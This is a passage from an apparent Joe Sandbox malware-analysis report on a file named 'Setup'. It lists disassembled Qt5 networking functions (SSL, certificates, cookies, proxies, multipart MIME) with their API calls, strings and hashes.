                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81E3
                                                                                                                                                              • ?system@QRandomGenerator64@@SAPEAV1@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81E9
                                                                                                                                                              • ?_fillRange@QRandomGenerator@@AEAAXPEAX0@Z.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E81FC
                                                                                                                                                              • ?number@QByteArray@@SA?AV1@_KH@Z.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E821A
                                                                                                                                                              • ?hash@QCryptographicHash@@SA?AVQByteArray@@AEBV2@W4Algorithm@1@@Z.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E822C
                                                                                                                                                              • ?toHex@QByteArray@@QEBA?AV1@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E823A
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E8247
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E8252
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E825D
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19EC10A,?,?,00000001,00007FFBA1975B43), ref: 00007FFBA19E8268
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$Random$?_fill?hash@?number@?system@Algorithm@1@@CryptographicDateGenerator64@@Generator@@Hash@@Hex@Range@Time@@V0@$$V0@@V1@_malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2954538713-0
                                                                                                                                                              • Opcode ID: ca848f34df8baed5c52c8df4a95fe6731a03c8979b863fa4f9ab393d405bf1ea
                                                                                                                                                              • Instruction ID: 93badbb9405a02e82f00a6395e5f8a85f2f5b90453f4562b679133ff6c0ec552
                                                                                                                                                              • Opcode Fuzzy Hash: ca848f34df8baed5c52c8df4a95fe6731a03c8979b863fa4f9ab393d405bf1ea
                                                                                                                                                              • Instruction Fuzzy Hash: C8416DB2A0AA52E3DB41DF21E9440AD7761FB84B64B404036DE5E07A64EF3CE56ACF40
                                                                                                                                                              Function 00007FFBA1A46C00 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 110windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • Random number generator not seeded, disabling SSL support, xrefs: 00007FFBA1A46D6B
                                                                                                                                                              • QSslSocket: OpenSSL >= 1.1.1 is required; %s was found instead, xrefs: 00007FFBA1A46CE5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Logger@@Message$?warning@Category@@Enabled@H00@Locker@@LoggingMutexWarning
                                                                                                                                                              • String ID: QSslSocket: OpenSSL >= 1.1.1 is required; %s was found instead$Random number generator not seeded, disabling SSL support
                                                                                                                                                              • API String ID: 3683325604-862028492
                                                                                                                                                              • Opcode ID: b5e3e1f0ddda3e8c900d5fe30d8033ede178577a79e740159409b0a4a62e538e
                                                                                                                                                              • Instruction ID: 278335ce5773766bb0c3d21f4413fc7b385e41e62bbde810134aaca75b1878b6
                                                                                                                                                              • Opcode Fuzzy Hash: b5e3e1f0ddda3e8c900d5fe30d8033ede178577a79e740159409b0a4a62e538e
                                                                                                                                                              • Instruction Fuzzy Hash: 7E5130B5E0EA8281FBD29B34E8513B92351FF85764F848137DD6E866A5FE2CD4498F00
                                                                                                                                                              Function 00007FFBA1A438E0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • Random number generator not seeded, disabling SSL support, xrefs: 00007FFBA1A43A31
                                                                                                                                                              • QSslSocket: OpenSSL >= 1.1.1 is required; %s was found instead, xrefs: 00007FFBA1A439C1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Logger@@Message$?warning@Category@@Enabled@H00@Locker@@LoggingMutexWarning
                                                                                                                                                              • String ID: QSslSocket: OpenSSL >= 1.1.1 is required; %s was found instead$Random number generator not seeded, disabling SSL support
                                                                                                                                                              • API String ID: 3683325604-862028492
                                                                                                                                                              • Opcode ID: 419ac4ac6747601f3d3b001d23896fcfe1302e08f7a7153f378a11863ca7b2df
                                                                                                                                                              • Instruction ID: 51d2c24f65068e71dab6d6f58188b62f3904836a75bffdc51d033dbb83e050a4
                                                                                                                                                              • Opcode Fuzzy Hash: 419ac4ac6747601f3d3b001d23896fcfe1302e08f7a7153f378a11863ca7b2df
                                                                                                                                                              • Instruction Fuzzy Hash: FF4172B5E1E69241FBD29B34E8113B92351AF95760F548137DD6E86296FF3CE4448F00
                                                                                                                                                              Function 00007FFBA1A46E00 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 80encryptionCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CertStore$Array@@ByteCertificateData@@FindList$?append@?dispose@CloseData@1@@Locker@@MutexOpenSystem
                                                                                                                                                              • String ID: ROOT
                                                                                                                                                              • API String ID: 2025113167-543233263
                                                                                                                                                              • Opcode ID: ca191dbbec9e86ef8eadb9ac6780318380c94cd915c27d351cdbd711ee9889ff
                                                                                                                                                              • Instruction ID: 84a46e26556724a8d768a2418620de494178106dea0cc7e688d2a7f37192e9ce
                                                                                                                                                              • Opcode Fuzzy Hash: ca191dbbec9e86ef8eadb9ac6780318380c94cd915c27d351cdbd711ee9889ff
                                                                                                                                                              • Instruction Fuzzy Hash: DF3180B260EB4682EB929B61E4505697361FF84B90F844032EE5D07B68FF7CE404CF00
                                                                                                                                                              Function 00007FFBA1A254D0 Relevance: 140.5, APIs: 77, Strings: 3, Instructions: 490timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$V0@@$String@@$Data$?index?size@$ArrayDatePtr@@@Time@@V0@$$$Base@@$?mid@Init_thread_footer$?at@?create?qstrcmp@@?trimmed@A@$$Array@@0@NodeNode@Ref@@$?contains@?from?recalc?setBase64@CriticalData@Empty@EnterLeftMostParent@SectionU1@@U2@_V1@@
                                                                                                                                                              • String ID: -----$-----$Proc-Type:
                                                                                                                                                              • API String ID: 2904550874-3384659063
                                                                                                                                                              • Opcode ID: ef0e9135e599dbb508f3339f1fb8c38075d4f7be1c085d129b67772428802bb3
                                                                                                                                                              • Instruction ID: 46a04375ca6f79a7a66ef766f50bb6b7b7ec3f452c50c03e73327791eaf6d935
                                                                                                                                                              • Opcode Fuzzy Hash: ef0e9135e599dbb508f3339f1fb8c38075d4f7be1c085d129b67772428802bb3
                                                                                                                                                              • Instruction Fuzzy Hash: 2342FAA2B0EA4296EB929B75E8441FC2371BB54768F804137CD2E565A4FF3CE949CF40
                                                                                                                                                              Function 00007FFBA1A41810 Relevance: 101.8, APIs: 47, Strings: 11, Instructions: 285timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$String$ArrayData@@$?data@Ref@@$Latin1$String@V0@@$CaseDateQt@@@Sensitivity@Time@@V0@$$$?child?mid@?startsChildEvent@Event@@@Object@@With@$Char@@Flags@Logger@@MessageString@@@$??8@?deallocate@?from?split?warning@BehaviorCategory@@Char@@@Enabled@H00@Latin1@LoggingQt@@@@Ref@Ref@@@Ref@@@@SplitU1@_Vector@Warning
                                                                                                                                                              • String ID: Au=$Enc=$Kx=$SSLv2$SSLv3$TLSv1$TLSv1.1$TLSv1.2$TLSv1.3$aecdh$export
                                                                                                                                                              • API String ID: 821356927-2395068383
                                                                                                                                                              • Opcode ID: 78d3016b8474adb11fb8d5f5ff203078bea895430e5b64763d461f7dc6da5277
                                                                                                                                                              • Instruction ID: 155aa46643deeea6e054662878b4236c51ffb217e117e84a8bd7519fa639c7c8
                                                                                                                                                              • Opcode Fuzzy Hash: 78d3016b8474adb11fb8d5f5ff203078bea895430e5b64763d461f7dc6da5277
                                                                                                                                                              • Instruction Fuzzy Hash: A8E14CB2A19A4286EB81CF25E8841A97771FB84B94F405136DE9E47A64FF3CD148CF40
                                                                                                                                                              Function 00007FFBA19F71B0 Relevance: 100.1, APIs: 54, Strings: 3, Instructions: 393timewindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Data@@List$V0@@$Array@@Byte$Url@@$?begin@$Latin1$?dispose@BasicData@1@@Mutex@@String@@@Timer@@$?lock@?scheme@Locker@@Logger@@MessageMutex$?detach_grow@?end@?host@?starts?warning@CaseComponentData@1@Empty@Flags@FormattingOption@Qt@@@Sensitivity@Url@@@@@With@malloc
                                                                                                                                                              • String ID: QNetworkProxyFactory: factory %p has returned an empty result set$localhost$localhost.
                                                                                                                                                              • API String ID: 1165985076-200979138
                                                                                                                                                              • Opcode ID: 4df03283c7b37d73bbc0dd34c735ac399d4751ef1342c9bba1abe23537ddf15b
                                                                                                                                                              • Instruction ID: 9ea4aae467a48a71d64c1e6950e6dce767426c78134dc1a498aff0ccee85d326
                                                                                                                                                              • Opcode Fuzzy Hash: 4df03283c7b37d73bbc0dd34c735ac399d4751ef1342c9bba1abe23537ddf15b
                                                                                                                                                              • Instruction Fuzzy Hash: AF126CB2A0AB4696EB81DF75E8585BC33A5FB44B58F404036DE5E47664EF3CD44ACB00
                                                                                                                                                              Function 00007FFBA1971810 Relevance: 94.8, APIs: 53, Strings: 1, Instructions: 288memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$V0@@$Url@@$Array@@Byte$?setArrayFlags@FormattingMode@1@@Name@Option@Parsing$??8@ComponentData@@String@@0@User$?allocate@?from?lock@?shared?userA@$$AllocationConcurrency::details::stl_critical_section_win7::stl_critical_section_win7Data@@@@@Empty@Encoded@Fragment@Latin1@Locker@@MutexMutex@@Null@Option@2@@@@U1@_Url@@@@@
                                                                                                                                                              • String ID: auth:
                                                                                                                                                              • API String ID: 1325311091-104923615
                                                                                                                                                              • Opcode ID: 1d1a258d46927fb7d7dc3f3517520e5033a66f7acdc2b8717017ccc0cb933d00
                                                                                                                                                              • Instruction ID: 70e99a66b3542c122841ec23d8a6f31444f047ddaa4ae582039ac868685b001d
                                                                                                                                                              • Opcode Fuzzy Hash: 1d1a258d46927fb7d7dc3f3517520e5033a66f7acdc2b8717017ccc0cb933d00
                                                                                                                                                              • Instruction Fuzzy Hash: C4E10EA2B0A90296EB52DB75D4541FC2371FF54B98B804032CD1E5BAA9EF3CE54ECB50
                                                                                                                                                              Function 00007FFBA1982A10 Relevance: 89.4, APIs: 45, Strings: 6, Instructions: 189timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$String@@$V0@@$DateTime@@$Empty@Locale@@String@@@$Ace@Char@@Latin1Qt@@@Spec@TimeUrl@@Utf8@$?mid@?startsA@$$BasicCaseChar@@@Country@0@@Language@0@Latin1@Sensitivity@String@Timer@@V2@@Valid@With@
                                                                                                                                                              • String ID: ; HttpOnly$; domain=$; expires=$; path=$; secure$ddd, dd-MMM-yyyy hh:mm:ss 'GMT
                                                                                                                                                              • API String ID: 4004675434-1286503551
                                                                                                                                                              • Opcode ID: 6c1b574ecc26248f16dcc74b214401073f602fee3eca1dcea2cf19a9746eddd1
                                                                                                                                                              • Instruction ID: b6e483da942d5a3892a39314b203366a1d8fdd20db05b9d7e812237b1a99bc3f
                                                                                                                                                              • Opcode Fuzzy Hash: 6c1b574ecc26248f16dcc74b214401073f602fee3eca1dcea2cf19a9746eddd1
                                                                                                                                                              • Instruction Fuzzy Hash: E3A109B2A0991295EB82DF35D8940FC2771FF54B9DB805032EE1E466A8EF3CD599CB40
                                                                                                                                                              Function 00007FFBA1978290 Relevance: 64.9, APIs: 27, Strings: 10, Instructions: 180windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1985180: ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA19851F4
                                                                                                                                                              • ?isValid@QVariant@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19782CB
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19782D8
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19782FC
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197830A
                                                                                                                                                              • ?reserve@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA1978317
                                                                                                                                                              • ??YQByteArray@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA1978328
                                                                                                                                                              • ??YQByteArray@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197836E
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197837F
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197838D
                                                                                                                                                              • ?reserve@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197839E
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19783A8
                                                                                                                                                              • ?begin@QByteArray@@QEAAPEADXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19783B5
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19783E0
                                                                                                                                                              • ?cend@QByteArray@@QEBAPEBDXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19783EC
                                                                                                                                                              • ?resize@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197842F
                                                                                                                                                              • ??0QVariant@@QEAA@AEBVQByteArray@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197843D
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA1978454
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197845E
                                                                                                                                                              • ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA1978482
                                                                                                                                                              • ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19784AE
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19784C7
                                                                                                                                                              • ?isReadable@QIODevice@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19784D8
                                                                                                                                                              • ?isOpen@QIODevice@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA19784EA
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA1978512
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197852D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA197853D
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00007FFBA1977FD4), ref: 00007FFBA1978547
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$String@@$Variant@@$?size@$Logger@@Message$?reserve@Device@@$?begin@?cend@?data@?resize@?warning@Array@@@Char@@Open@Readable@V0@@Valid@
                                                                                                                                                              • String ID: 1.0$; boundary="$MIME-Version$alternative$could not open device for reading$device is not readable$form-data$mixed$multipart/$related
                                                                                                                                                              • API String ID: 1441787932-1383949304
                                                                                                                                                              • Opcode ID: 9762019b96d965fc461aba943df09b89469ba1d0724ff600b312d291376f0686
                                                                                                                                                              • Instruction ID: 507018656d0daa9dd4d9231c0a3f9337791ac3dab355f59cbf73b41ce3a33463
                                                                                                                                                              • Opcode Fuzzy Hash: 9762019b96d965fc461aba943df09b89469ba1d0724ff600b312d291376f0686
                                                                                                                                                              • Instruction Fuzzy Hash: 2281B4B2A0DA5285EB92DF35E8540B82761FF45BACB849132DD1E07A65EF3CD54ACF00
                                                                                                                                                              Function 00007FFBA1972130 Relevance: 63.2, APIs: 35, Strings: 1, Instructions: 154timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
